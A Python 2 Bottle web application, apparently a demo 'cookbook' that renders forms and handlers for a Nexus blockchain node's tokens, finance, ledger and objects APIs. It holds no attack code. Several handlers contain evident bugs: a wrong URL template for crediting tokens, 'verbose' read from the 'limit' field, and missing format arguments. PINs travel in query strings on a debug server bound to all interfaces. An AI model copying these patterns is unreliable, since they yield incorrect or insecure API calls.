red("assets/list/asset/history needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_list_asset_history_by_address(address) genid = sdk.genesis_id else: output = curl(assets_list_asset_history_address.format("", session, address, "")) genid = "" #endif output = format_transactions(output) return(show(output, session, genid)) #enddef #------------------------------------------------------------------------------ # # build_accounts_html # tokens_create_token = \ '{}tokens/create/token?pin={}&session={}&name={}&supply={}&decimals={}{}' tokens_create_account = \ '{}tokens/create/account?pin={}&session={}&name={}&token_name={}{}' tokens_get_token_name = '{}tokens/get/token?session={}&name={}{}' tokens_get_token_address = '{}tokens/get/token?session={}&address={}{}' tokens_get_account_name = '{}tokens/get/account?session={}&name={}{}' tokens_get_account_address = '{}tokens/get/account?session={}&address={}{}' tokens_debit_token = ('{}tokens/debit/token?pin={}&session={}&name={}' + \ '&name_to={}&amount={}{}') tokens_credit_token = ('{}tokens/credit/token?pin={}&session={}&name={}' + \ '&amount={}&txid={}{}') tokens_debit_account = ('{}tokens/debit/account?pin={}&session={}' + \ '&amount={}&name={}&name_to={}{}') tokens_credit_account = ('{}tokens/credit/account?pin={}&session={}' + \ '&txid={}&amount={}&name={}&name_proof={}{}') def build_tokens_html(sid, genid, o): f = form_footer o += "<br><b>Tokens API</b><br><br><table>" o += "<tr><td>" h = "tokens-get-token-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(tokens_get_token_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "tokens-get-token-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(tokens_get_token_address).format(h, session, address, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-create-token") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) name = form_parm.format("name", "") supply = form_parm.format("supply", "") d = form_parm.format("decimals", "2") o += hl(tokens_create_token).format(h, pin, session, name, supply, d, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-debit-token") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) amount = form_parm.format("amount", "") name = form_parm.format("name", "") name_to = form_parm.format("name_to", "") o += hl(tokens_debit_token).format(h, pin, session, name, name_to, amount, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-credit-token") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) name = form_parm.format("name", "") amount = form_parm.format("amount", "") txid = form_parm.format("txid", "") o += hl(tokens_credit_token).format(h, pin, session, name, amount, txid, f) o += "</td></tr>" o += "<tr><td>" h = "tokens-get-account-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(tokens_get_account_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "tokens-get-account-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(tokens_get_account_address).format(h, session, address, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-create-account") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) name = form_parm.format("name", "") token_name = form_parm.format("token_name", "") o += hl(tokens_create_account).format(h, pin, session, name, token_name, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-debit-account") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) amount = form_parm.format("amount", "") name = form_parm.format("name", "") name_to = form_parm.format("name_to", "") o += hl(tokens_debit_account).format(h, pin, session, amount, name, name_to, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("tokens-credit-account") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) txid = form_parm.format("txid", "") amount = form_parm.format("amount", "") name = form_parm.format("name", "") proof = form_parm.format("name_proof", "") o += hl(tokens_credit_account).format(h, pin, session, txid, amount, name, proof, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/tokens-create-token', method="post") def do_tokens_create_token(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") supply = bottle.request.forms.get("supply") decimals = bottle.request.forms.get("decimals") if (no_parms(pin, session, name, supply, decimals)): m = red("tokens/create/token needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_create_token(name, supply, decimals) genid = sdk.genesis_id else: output = curl(tokens_create_token.format("", pin, session, name, supply, decimals, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-create-account', method="post") def do_tokens_create_account(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") token_name = bottle.request.forms.get("token_name") if (no_parms(pin, session, name, token_name)): m = red("tokens/create/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_create_account(name, token_name) genid = sdk.genesis_id else: output = curl(tokens_create_account.format("", pin, session, name, token_name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-get-token-name', method="post") def do_tokens_get_token_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("tokens/get/token needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_get_token_by_name(name) genid = sdk.genesis_id else: output = curl(tokens_get_token_name.format("", session, name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-get-token-address', method="post") def do_tokens_get_token_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("tokens/get/token needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_get_token_by_address(address) genid = sdk.genesis_id else: output = curl(tokens_get_token_address.format("", session, address, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-get-account-name', method="post") def do_tokens_get_account_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("tokens/get/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_get_account_by_name(name) genid = sdk.genesis_id else: output = curl(tokens_get_account_name.format("", session, name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-get-account-address', method="post") def do_tokens_get_account_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("tokens/get/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_get_account_by_address(address) genid = sdk.genesis_id else: output = curl(tokens_get_account_address.format("", session, address, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-debit-token', method="post") def do_tokens_debit_token(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") amount = bottle.request.forms.get("amount") name = bottle.request.forms.get("name") name_to = bottle.request.forms.get("name_to") if (no_parms(pin, session, amount, name, name_to)): return(show(red("tokens/debit/token needs more input parameters"), session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_debit_token_by_name(name, name_to, amount) genid = sdk.genesis_id else: output = curl(tokens_debit_token.format("", pin, session, name, name_to, amount, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-credit-token', method="post") def do_tokens_credit_token(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") amount = bottle.request.forms.get("amount") name = bottle.request.forms.get("name") txid = bottle.request.forms.get("txid") if (no_parms(pin, session, name, amount, txid)): m = red("tokens/credit/token needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_credit_token_by_name(name, amount, txid) genid = sdk.genesis_id else: output = curl(tokens_debit_account.format("", pin, session, name, amount, txid, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-debit-account', method="post") def do_tokens_debit_account(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") amount = bottle.request.forms.get("amount") name = bottle.request.forms.get("name") name_to = bottle.request.forms.get("name_to") if (no_parms(pin, session, amount, name, name_to)): m = red("tokens/debit/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_debit_account_by_name(name, name_to, amount) genid = sdk.genesis_id else: output = curl(tokens_debit_account.format("", pin, session, amount, name, name_to, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-credit-account', method="post") def do_tokens_credit_account(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") txid = bottle.request.forms.get("txid") amount = bottle.request.forms.get("amount") name = bottle.request.forms.get("name") name_proof = bottle.request.forms.get("name_proof") if (no_parms(pin, session, txid, amount, name, name_proof)): m = red("tokens/credit/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_credit_account_by_name(name, amount, txid) genid = sdk.genesis_id else: output = curl(tokens_credit_account.format("", pin, session, txid, amount, name, name_proof, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef #------------------------------------------------------------------------------ # # build_finance_html # finance_create_account = '{}finance/create/account?pin={}&session={}&name={}{}' finance_get_account_name = '{}finance/get/account?session={}&name={}{}' finance_get_account_address = '{}finance/get/account?session={}&address={}{}' finance_debit_account = ('{}finance/debit/account?pin={}&session={}' + \ '&amount={}&name_from={}&name_to={}{}') finance_credit_account = ('{}finance/credit/account?pin={}&session={}' + \ '&txid={}&amount={}&name_to={}&name_proof={}{}') finance_list_accounts = '{}finance/list/accounts?session={}{}' finance_get_stakeinfo = '{}finance/get/stakeinfo?session={}{}' finance_set_stake = '{}finance/set/stake?pin={}&session={}&amount={}{}' def build_finance_html(sid, genid, o): f = form_footer o += "<br><b>Finance API</b><br><br><table>" o += "<tr><td>" h = "finance-get-account-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(finance_get_account_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "finance-get-account-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(finance_get_account_address).format(h, session, address, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("finance-create-account") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(finance_create_account).format(h, pin, session, name, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("finance-debit-account") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) amount = form_parm.format("amount", "") name_from = form_parm.format("name_from", "") name_to = form_parm.format("name_to", "") o += hl(finance_debit_account).format(h, pin, session, amount, name_from, name_to, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("finance-credit-account") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) txid = form_parm.format("txid", "") amount = form_parm.format("amount", "") name_to = form_parm.format("name_to", "") proof = form_parm.format("name_proof", "") o += hl(finance_credit_account).format(h, pin, session, txid, amount, name_to, proof, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("finance-get-stakeinfo") session = form_parm.format("session", sid) o += hl(finance_get_stakeinfo).format(h, session, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("finance-set-stake") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) amount = form_parm.format("amount", "") o += hl(finance_set_stake).format(h, pin, session, amount, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("finance-list-accounts") session = form_parm.format("session", sid) o += hl(finance_list_accounts).format(h, session, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/finance-get-account-name', method="post") def do_finance_get_account_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("finance/get/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_get_account_by_name(name) genid = sdk.genesis_id else: output = curl(finance_get_account_name.format("", session, name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/finance-get-account-address', method="post") def do_finance_get_account_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("finance/get/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_get_account_by_address(address) genid = sdk.genesis_id else: output = curl(finance_get_account_address.format("", session, address, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/finance-create-account', method="post") def do_finance_create_account(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(pin, session, name)): m = red("finance/create/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_create_account(name) genid = sdk.genesis_id else: output = curl(finance_create_account.format("", pin, session, name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/finance-debit-account', method="post") def do_finance_debit_account(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") amount = bottle.request.forms.get("amount") name_from = bottle.request.forms.get("name_from") name_to = bottle.request.forms.get("name_to") if (no_parms(pin, session, amount, name_from, name_to)): return(show(red("finance/debit/account needs more input parameters"), session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_debit_account_by_name(name_from, name_to, amount) genid = sdk.genesis_id else: output = curl(finance_debit_account.format("", pin, session, amount, name_from, name_to, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/finance-credit-account', method="post") def do_finance_credit_account(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") txid = bottle.request.forms.get("txid") amount = bottle.request.forms.get("amount") name_to = bottle.request.forms.get("name_to") name_proof = bottle.request.forms.get("name_proof") if (no_parms(pin, session, txid, amount, name_to, name_proof)): m = red("finance/credit/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_credit_account_by_name(name_to, amount, txid) genid = sdk.genesis_id else: output = curl(finance_credit_account.format("", pin, session, txid, amount, name_to, name_proof, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/finance-list-accounts', method="post") def do_list_accounts(): session = bottle.request.forms.get("session") if (no_parms(session)): m = red("finance/list/acccounts needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_list_accounts() genid = sdk.genesis_id else: output = curl(finance_list_accounts.format("", session, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/finance-get-stakeinfo', method="post") def do_get_stakeinfo(): session = bottle.request.forms.get("session") if (no_parms(session)): m = red("finance/get/stakeinfo needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_get_stakeinfo() genid = sdk.genesis_id else: output = curl(finance_get_stakeinfo.format("", session, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/finance-set-stake', method="post") def do_set_stake(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") amount = bottle.request.forms.get("amount") if (no_parms(pin, session, amount)): m = red("finance/set/stake needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_set_stake(amount) genid = sdk.genesis_id else: output = curl(finance_set_stake.format("", pin, session, amount, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef #------------------------------------------------------------------------------ # # build_ledger_html # ledger_get_blockhash = '{}ledger/get/blockhash?height={}{}' ledger_get_block_height = '{}ledger/get/block?height={}&verbose={}{}' ledger_get_block_hash = '{}ledger/get/block?hash={}&verbose={}{}' ledger_get_transaction = '{}ledger/get/transaction?hash={}&verbose={}{}' ledger_get_mininginfo = '{}ledger/get/mininginfo{}' ledger_submit_transaction = '{}ledger/submit/transaction?data={}{}' ledger_list_blocks_height = \ '{}ledger/list/blocks?height={}&limit={}&verbose={}{}' ledger_list_blocks_hash = '{}ledger/list/blocks?hash={}&limit={}&verbose={}{}' def build_ledger_html(sid, genid, o): f = form_footer o += "<br><b>Ledger API</b><br><br><table>" o += "<tr><td>" h = "ledger-get-transaction" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) hsh = form_parm.format("hash", "") v = form_parm.format("verbose", "1") o += hl(ledger_get_transaction).format(h, hsh, v, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-get-block-height" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) height = form_parm.format("height", "") v = form_parm.format("verbose", "1") o += hl(ledger_get_block_height).format(h, height, v, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-get-block-hash" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) hsh = form_parm.format("hash", "") v = form_parm.format("verbose", "1") o += hl(ledger_get_block_hash).format(h, hsh, v, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-get-blockhash" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) height = form_parm.format("height", "") o += hl(ledger_get_blockhash).format(h, height, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-submit-transaction" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) d = form_parm.format("data", "") o += hl(ledger_submit_transaction).format(h, d, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-list-blocks-height" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) height = form_parm.format("height", "") l = form_parm.format("limit", "100") v = form_parm.format("verbose", "1") o += hl(ledger_list_blocks_height).format(h, height, l, v, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-list-blocks-hash" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) hsh = form_parm.format("hash", "") l = form_parm.format("limit", "100") v = form_parm.format("verbose", "1") o += hl(ledger_list_blocks_hash).format(h, hsh, l, v, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/ledger-get-blockhash', method="post") @bottle.route('/ledger-get-blockhash/<sid>', method="post") def do_ledger_get_blockhash(sid=""): height = bottle.request.forms.get("height") if (no_parms(height)): m = red("ledger/get/blockhash needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_get_blockhash(height) genid = sdk.genesis_id else: output = curl(ledger_get_blockhash.format("", height, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/ledger-get-block-height', method="post") @bottle.route('/ledger-get-block-height/<sid>', method="post") def do_ledger_get_block_height(sid=""): height = bottle.request.forms.get("height") verbose = bottle.request.forms.get("verbose") if (no_parms(height, verbose)): m = red("ledger/get/block needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_get_block_by_height(height, verbose) genid = sdk.genesis_id else: output = curl(ledger_get_block_height.format("", height, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/ledger-get-block-hash', method="post") @bottle.route('/ledger-get-block-hash/<sid>', method="post") def do_ledger_get_block_hash(sid=""): hsh = bottle.request.forms.get("hash") verbose = bottle.request.forms.get("verbose") if (no_parms(hsh, verbose)): m = red("ledger/get/block needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_get_block_by_hash(hsh, verbose) genid = sdk.genesis_id else: output = curl(ledger_get_block_hash.format("", hsh, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/ledger-get-transaction', method="post") @bottle.route('/ledger-get-transaction/<sid>', method="post") def do_ledger_get_transaction(sid=""): hsh = bottle.request.forms.get("hash") verbose = bottle.request.forms.get("verbose") if (no_parms(hsh, verbose)): m = red("ledger/get/transaction needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_get_transaction(hsh, verbose) genid = sdk.genesis_id else: output = curl(ledger_get_transaction.format("", hsh, verbose, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/ledger-submit-transaction', method="post") @bottle.route('/ledger-submit-transaction/<sid>', method="post") def do_ledger_submit_transaction(sid=""): data = bottle.request.forms.get("data") if (no_parms(data)): m = red("ledger/submit/transaction needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_submit_transaction(data) genid = sdk.genesis_id else: output = curl(ledger_submit_transaction.format("", data, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/ledger-list-blocks-height', method="post") @bottle.route('/ledger-list-blocks-height/<sid>', method="post") def do_ledger_list_blocks_height(sid=""): height = bottle.request.forms.get("height") l = bottle.request.forms.get("limit") verbose = bottle.request.forms.get("limit") if (no_parms(height, l, verbose)): m = red("ledger/list/blocks needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_list_blocks_by_height(height, l, verbose) genid = sdk.genesis_id else: output = curl(ledger_list_blocks_height.format("", height, l, verbose, "")) genid = "" #endif output = format_transactions(output) return(show(output, sid, genid)) #enddef @bottle.route('/ledger-list-blocks-hash', method="post") @bottle.route('/ledger-list-blocks-hash/<sid>', method="post") def do_ledger_list_blocks_hash(sid=""): hsh = bottle.request.forms.get("hash") l = bottle.request.forms.get("limit") verbose = bottle.request.forms.get("limit") if (no_parms(hsh, l, verbose)): m = red("ledger/list/blocks needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_list_blocks_by_hash(hsh, l, verbose) genid = sdk.genesis_id else: output = curl(ledger_list_blocks_hash.format("", hsh, l, verbose, "")) genid = "" #endif output = format_transactions(output) return(show(output, sid, genid)) #enddef #------------------------------------------------------------------------------ # # build_objects_html # objects_create_schema = ('{}objects/create/schema?pin={}&session={}' +\ '&name={}&format=json&json={}{}') objects_get_schema_name = '{}objects/get/schema?name={}&format=json{}' objects_get_schema_address = '{}objects/get/schema?address={}&format=json{}' def build_objects_html(sid, genid, o): f = form_footer o += "<br><b>Objects API</b><br><br><table>" o += "<tr><td>" h = "objects-get-schema-name" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) name = form_parm.format("name", "") o += hl(objects_get_schema_name).format(h, name, f) o += "</td></tr>" o += "<tr><td>" h = "objects-get-schema-address" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) address = form_parm.format("address", "") o += hl(objects_get_schema_address).format(h, address, f) o += "</td></tr>" o += "<tr><td>" h = "objects-create-schema" h = form_header.format(h) pin = form_parm.format("pin", "") session = form_parm.format("session", sid) name = form_parm.format("name", "") j = form_parm.format("json", "") o += hl(objects_create_schema).format(h, pin, session, name, j, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/objects-create-schema', method="post") def do_objects_create_schema(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") j = bottle.request.forms.get("json") if (no_parms(pin, session, name, j)): m = red("objects/create/schema needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_objects_create_schema(name, j) genid = sdk.genesis_id else: output = curl(objects_create_schema.format("", pin, session, name, j, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/objects-get-schema-name', method="post") @bottle.route('/objects-get-schema-name/<sid>', method="post") def do_objects_get_schema_name(sid=""): name = bottle.request.forms.get("name") if (no_parms(name)): m = red("objects/get/schema needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_objects_get_schema_by_name(name) genid = sdk.genesis_id else: output = curl(objects_get_schema_name.format("", name, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/objects-get-schema-address', method="post") @bottle.route('/objects-get-schema-address/<sid>', method="post") def do_objects_get_schema_address(sid=""): address = bottle.request.forms.get("address") if (no_parms(address)): m = red("objects/get/schema needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_objects_get_schema_by_address(address) genid = sdk.genesis_id else: output = curl(objects_get_schema_address.format("", address, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef #------------------------------------------------------------------------------ # # build_body_page # # Fill in all API calls into body page. # def build_body_page(sid="", genid=""): output = "" output = build_url_html(output) output = build_system_html(sid, genid, output) output = build_users_html(sid, genid, output) output = build_ledger_html(sid, genid, output) output = build_tokens_html(sid, genid, output) output = build_assets_html(sid, genid, output) output = build_supply_html(sid, genid, output) output = build_finance_html(sid, genid, output) # # Back end for objects API is not done yet. Don't show user. # # output = build_objects_html(sid, genid, output) return(output) #enddef @bottle.route('/') def do_landing(): output = build_body_page() hostname = blue(socket.gethostname()) sdk = blue(nexus_sdk_last_username) api = blue(nexus_api_last_username) return(landing_page.format(hostname, sdk, api, output)) #enddef @bottle.route('/url/<api_or_sdk>', method="post") def do_url(api_or_sdk): global nexus_api_node, nexus_sdk_node url = bottle.request.forms.get("url") if (api_or_sdk == "api"): nexus_api_node = url #endif if (api_or_sdk == "sdk"): nexus.sdk_change_url(url) nexus_sdk_node = url #endif output = build_body_page() hostname = blue(socket.gethostname()) sdk = blue(nexus_sdk_last_username) api = blue(nexus_api_last_username) return(landing_page.format(hostname, sdk, api, output)) #enddef #------------------------------------------------------------------------------ # # ---------- Main program entry point. ---------- # date = commands.getoutput("date") print "cookbook starting up at {}".format(date) # # Run web server. # bottle.run(host="0.0.0.0", port=cookbook_port, debug=True) exit(0) #------------------------------------------------------------------------------
32.942912
79
0.608204
11,195
85,981
4.506833
0.033497
0.056685
0.078487
0.091569
0.823879
0.780989
0.741705
0.706604
0.684168
0.658659
0
0.002327
0.210326
85,981
2,609
80
32.955539
0.740769
0.056675
0
0.645279
0
0.001043
0.187398
0.076987
0
0
0
0
0
0
null
null
0.007303
0.003652
null
null
0.001043
0
0
0
null
0
0
0
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
25ad660c2b19cabb23bb404bf035f8e5eb6b271c
48
py
Python
GUI/__init__.py
LANCEREN/Graduation-Design_Py
7c636867efba91cb6a828fb9fd96046d5f844bce
[ "MIT" ]
null
null
null
GUI/__init__.py
LANCEREN/Graduation-Design_Py
7c636867efba91cb6a828fb9fd96046d5f844bce
[ "MIT" ]
4
